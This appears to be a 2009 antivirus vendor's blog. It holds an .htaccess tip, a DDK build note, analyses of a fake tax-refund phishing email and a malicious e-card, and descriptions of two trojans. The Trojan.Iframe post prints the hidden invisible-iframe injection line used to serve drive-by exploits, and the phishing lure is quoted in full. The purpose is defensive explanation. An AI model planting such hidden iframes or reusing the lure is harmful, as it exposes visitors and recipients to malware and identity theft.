Saturday, March 14, 2009
How to redirect a 404 error page
All you have to do is to add this rule in your .htaccess file:
ErrorDocument 404 /index.html
Enjoy :)
Friday, March 13, 2009
Money from Canadian Revenue Agency
Cool!!! .. but hey, I don't live in Canada, what is going on ?
The e-mail looks ok, as you can see below:
Canada Revenue Agency
Online Refund Form
After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 386.00.
Please submit the tax refund and allow us 3-9 days in order to process it.
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.
To access the form for your tax refund, please click here
Copyright Canada Revenue Agency. All rights reserved. www.cra-arc.gc.ca
Now, the fake website for the online refund form is in Taiwan and last time I looked, Taiwan wasn't a part of Canada.
If we start analyzing we can see that this is just another case of identity theft. You have there the following elements:
Social Insurance Number, DOB(date of birth), and the Full Name.
So, unfortunatelly it's just a spam, it was too good to be true, maybe next time..
Happy greetings e-card is waiting for you
Just opened the mail in the morning and I see in the junk folder an interesting message.
It appeares that someone sent me an e-card, too bad is not my birthday.
The mail looks like this:
Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=?-XXXXX..X-
This card was sent from 123greetings.com!
At first glance this may look valid to anyone. 123greetings.com is a valid websites with some lovely e-cards.
Now the question that arise, is why the link isn't from 123greetings.com ?
So, we downloaded the webpage and had such a "BIG" surprise, it has a link to a "card.exe". Now that's funny.
How many clean exe e-cards from 123greetings have you seen ? The correct answer is NONE
Fortunately, the "card.exe" (MD5:88dfdfa6ba077c18df753f279a51258d) is already detected by us and several antivirus scanners:
Email-Worm.Win32.Iksmas.by(Kaspersky), W32/Waledac.gen.a(McAfee), Trojan:Win32/Waledac.B(Microsoft)
So, we can learn from this e-mail the fact that even if someone sends us a message that appears to be from a valid website, always check the link to see where it points to.
Enjoy :)
MD5 database for Vista
How to create a native application in C
After that, you need to create 2 files in your working directory:
makefile
!INCLUDE $(NTMAKEENV)\makefile.def
and
sources
TARGETNAME=myprog
TARGETPATH=OBJ
TARGETTYPE=PROGRAM
SOURCES=myprog.c
Now create your myprog.c file and don't forget to use only Native API's. When you're done, run the checked/free windows ddk command prompt, go to your working folder and type the following command:
build
If everything was ok, you should have a new folder (like objchk_wxp_x86, objfree_wxp_x86, etc) with an exe in it. Btw, don't forget that you can't run it like a normal windows app!
Enjoy :)
Trojan.Iframe
[Description]
You can find it almost anywhere, it is small and can hardly be seen :)
You can encounter it even on websites that are supposed to be clean because malicious people are using all kinds of exploits for known platforms in order to successfully append a small piece of code to a certain web page.
In order to understand it better, let me show you how it appears:
iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden
(other variants are the same, there are different atributes, sources, etc.. but they have the same behaviour)
As you can see, it isn't something extraordinary, just one line of code.. but let's see what it does.
First it will create an invisible frame that points to a certain website. Usually that website is a fake one or a real one that was hacked.
Now, the content that is received from that IP it is malicious. It can be an exploit, for example a specially crafted image that when is rendered it will trigger a buffer overflow and arbitrary code will be executed. This has the potential to take over the entire machine and add it to a very large botnet.
A botnet is a network of zombie computers that have the purpose to serve a malicious person. They can send spam, attack other computer causing a Denial Of Service, etc...
Also, it can add a keylogger in order to gather passwords, credit card numbers and other confidential informations.
Their primary purpose is to gather money, so they will continue to do this and alot more in order to ensure that.
Now, as you can see, with just one line of code someone can have access to your entire system. It can even monitor your activity right now...
[Clean]
What you can do in order to prevent this.. hmm.. not much. If you are a regular user that don't want to do complicated things, then you can just have an antivirus installed and keep your computer updated.
If you are a person that cares very much about security then you can add a few more layers of protection, for example you can just use a virtual machine (VMWare, VirtualPC, etc..) in order to navigate on the internet.
But usually if you have a good antivirus installed and updated, then you can say that you are protected, but don't navigate on malicious websites :)
Still, if the antivirus warns you about it, then usually all you have to do is to delete the infected file (this can be achieved by deleting the temporary internet files, or the cache, it depends on your browser).
Trojan.VB.28672
[Description]
The trojan aims to appear as a valid picture, movie or a valid application.
This is the spreading method, by searching for media files or applications and coping itself there with a similar name
When it is run, it will show a message box with one of the following fake errors:
After that it start to search in all the folders for media files (avi, jpg and mp3 extensions)
If it finds a media file, then it copies itself in the same folder, borrow the same name
but adds the .exe extension (eq: picture1.jpg.exe)
Also, it search for application files (exe extension)
If it finds an exe file, then it copies itself in the same folder but it will add a random letter
in front of the name.
Also it checks the size of every file and if it is 28,672 bytes, it will not infect it. It does that
in order to avoid creating a copy for a file that is already infected
You can easily check if the virus is active by opening Task Manager and looking for a "L_and_A"
application like in the following picture:
[Clean]
Download our removal tool (Trojan.VB.28672-removaltool.zip) and restart the system in safe mode.
Extract the contents of the zip file to a folder. After that go to the folder where you have extracted
the contents of the archive and double click on the removaltool application. An easy to use graphical
interface will appear. You have to check the "Scan and clean" option and press on the "Scan" button.